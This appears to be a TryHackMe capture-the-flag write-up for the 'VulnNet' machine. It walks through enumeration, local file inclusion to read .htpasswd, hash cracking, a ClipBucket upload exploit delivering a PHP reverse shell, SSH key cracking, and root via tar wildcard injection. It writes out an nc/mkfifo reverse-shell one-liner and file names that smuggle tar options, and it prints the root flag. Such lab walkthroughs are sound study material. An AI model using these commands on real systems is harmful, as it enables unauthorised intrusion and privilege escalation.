# TryHackMe - Vulnet Writeup ###### tags: `writeup` `tryhackme` `vulnet` `medium` ## :computer: Port Scanning ```bash=1 nmap -sC -sV -v -p- -T4 -oN Ports 10.10.124.152 ```  There are two open ports: * Port 22 : Default port for Secure Shell. Secure Protocol and encrypted data. Service name is **OpenSSH** and version is **7.6p1** * Port 80 : Default HTTP port. **Apache** is the web server and the version is **httpd 2.4.29** ## :eye: Enumeration ### Fuzzing HTTP Service As we only have the http service available while we check the page we fuzz it to get interesting directories, in this case I will use ffuf since it is written in go and it will make the fuzzing task much faster. ```bash= ffuf -u "http://vulnnet.thm/FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fc 404 -t 50 ``` #### Ffuf Explanation * The **-u** flag indicates the URL of the web page. * The **-W** flag indicates the wordlist that we gonna use to fuzz. * The **-fc** flag avoids the various status codes that you specify. * The **-t** flag set the number of threads that run at the same time fuzzing, in this case i use 50 for ctf, maybe if you use more like 100 or 150 could show fake responses. ```console /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.3.1 Kali Exclusive <3 ________________________________________________ :: Method : GET :: URL : http://vulnnet.thm/FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 50 :: Matcher : Response status: 200,204,301,302,307,401,403,405 :: Filter : Response status: 404 ________________________________________________ [Status: 200, Size: 5829, Words: 1689, Lines: 142] # directory-list-2.3-medium.txt [Status: 200, Size: 5829, Words: 1689, Lines: 142] img [Status: 301, Size: 308, Words: 20, Lines: 10]Lines: 142] # [Status: 200, Size: 5829, Words: 1689, Lines: 142] css [Status: 301, Size: 308, Words: 20, Lines: 10] js [Status: 301, Size: 307, Words: 20, Lines: 10] fonts [Status: 301, Size: 310, Words: 20, Lines: 10] [Status: 200, Size: 5829, Words: 1689, Lines: 142] server-status [Status: 403, Size: 276, Words: 20, Lines: 10] :: Progress: [220560/220560] :: Job [1/1] :: 795 req/sec :: Duration: [0:05:07] :: Errors: 0 :: ``` ### :card_index_dividers:Subdirectory Enumeration The js subdirectory seems interesant, and inside there are two obfuscated js binaries.   ## :bomb: Explotation ### JavaScript Deobfuscation :::info To desobfuscate Javascript binaries we can use web like [this](https://deobfuscate.io/). ::: If we read the first js we can see this parameter: ```javascript= return n.d(t, "a", t), t; }, n.o = function (e, t) { return Object.prototype.hasOwnProperty.call(e, t); }, n.p = "http://vulnnet.thm/index.php?referer=", n(n.s = 0); }({0: function (e, t, n) ``` In the second js we can see some subdirectory: ```javascript= t.o = function (a, e) { return Object.prototype.hasOwnProperty.call(a, e); }, t.p = "http://broadcast.vulnnet.thm", t(t.s = 0); }({0: function (a, e, t) { a.exports = t("WdQY"); }, WdQY: function (a, e, t) { "use strict"; ``` Now we know theres an LFI and other application lets check inside the subweb. For look into the subdomain we have to put into /etc/hosts ```bash= echo "10.10.32.192 broadcast.vulnnet.thm" >> /etc/hosts ``` When you enter to the subdomain it requires password  To know this we have to found the .htaccess file of broadcast.vulnnet.thm As the server is an apache we will look at the apache2 default configuration folder, which is > /etc/apache2/sites-enabled/000-default.conf In order to see the file we will use the LFI and we will look at the source code in such a way that the link looks like this >view-source:http://vulnnet.thm/?referer=/etc/apache2/sites-enabled/000-default.conf  If you can see, now you know the directory of .htpasswd > /etc/apache2/.htpasswd Following the same method we found a user and a hashed password ```bash=1 developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0 ``` ### :lock:Cracking password hashes with John Write the hash into a binary with this command: ```bash= echo $apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0 > hash ``` Now we going to use John, go to the binary with the hash inside and start John ```console john crack --wordlist=/usr/share/wordlists/rockyou.txt ``` The cracked password obtained now we are gonna use to enter in the subdomain. developers : (crackedpasswd) ### Inside the Subdomain When you enter the web you can see it's a clipbucket web and if you view the source code yo can look the version of it.  And if you look on [exploit-db](https://www.exploit-db.com/) you can found the [exploit](https://www.exploit-db.com/exploits/44250).  This exploit permits to upload files to the clipbucket so we are going to prepare a php reverse shell, if you are in kali you can copy the php reverse shell from: >/usr/share/webshells/php/php-reverse-shell.php Copy the webshell to your Machine directory and edit with nano to put your vpn ip and your listen port. It looks like this:  ### Uploading the webshell to Clipbucket Following the Exploit you have to go to the updated webshell folder and rename to anyname.php , next ```bash curl -F "file=@anyname.php" -F "plupload=1" -F "name=anyname.php" "http://broadcast.vulnnet.thm/actions/beats_uploader.php" -u developers:<passwd> ```  Before you execute the webshell start a listener: ```bash= nc -nlvp 1234 ``` Next execute the webshell go to /files this could be the directory : > http://broadcast.vulnnet.thm/files/photos/2021/09/02/16306000813aa88a.php And PWN! We have revere shell but with the www-data user.  If you observed i write rlwrap before the nc command , this tool give us more interactivity to the shell but don't works always so we have to upgrade to tty. --- ### Privesc to User If you look into the /var/backups directory you could find the ssh-backup.tar.gz file. To decompress it use: >tar xvf backup.tar.gz When you decompress it you obtain a encrypted private key that you can crack it with john, but to be crackable for john first it has to be converted with ssh2john.py ```console python /usr/share/john/ssh2john.py id_rsa > crack ``` After this you should obtain something like this:  Now you can crack the binary with john too, and use the same command but changing the binary , this is the command: > john crack --wordlist=/usr/share/wordlists/rockyou.txt Once you crack the file you obtain the passphrase and you can login into the ssh with the private ecrypted key. > ssh -i id_rsa server-management@10.10.43.115 with this go to $HOME of server-management and you can cat **User Flag**  --- ### Root Privesc To privesc to root i used a spanish tool called [linpeas](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS). With linpeas i enumerated most of the possible privesc and discovered something interesting on cron.  There's look into **backupsrv.sh**  Now we can see there's a wildcard vulnerability in here, always we use tar with a wildcard, we can create files that can get executed. More info [here](https://book.hacktricks.xyz/linux-unix/privilege-escalation/wildcards-spare-tricks). Create a binary inside $HOME/server-management/Documents that contains this: ```bash= #!/bin/bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc <ip> 1234 > /tmp/f ``` After create the binary enter this commands: > echo > '--checkpoint=1' > echo > '--checkpoint-action-exec=sh shell.sh' Start a netcat listener and wait a few seconds to receive the root shell. ```bash= cat /root/root.txt THM{220b671dd8adc301b34c2738ee8295ba} ``` ### You can find me on: :bird:[**Twitter**](https://twitter.com/Aka_Mecanico) :desktop_computer: [**Github**](https://github.com/Mec4nico) :ballot_box_with_check: [**TryHackMe**](https://tryhackme.com/p/mech4nico) :green_book:[**HackTheBox**](https://www.hackthebox.eu/home/users/profile/336092)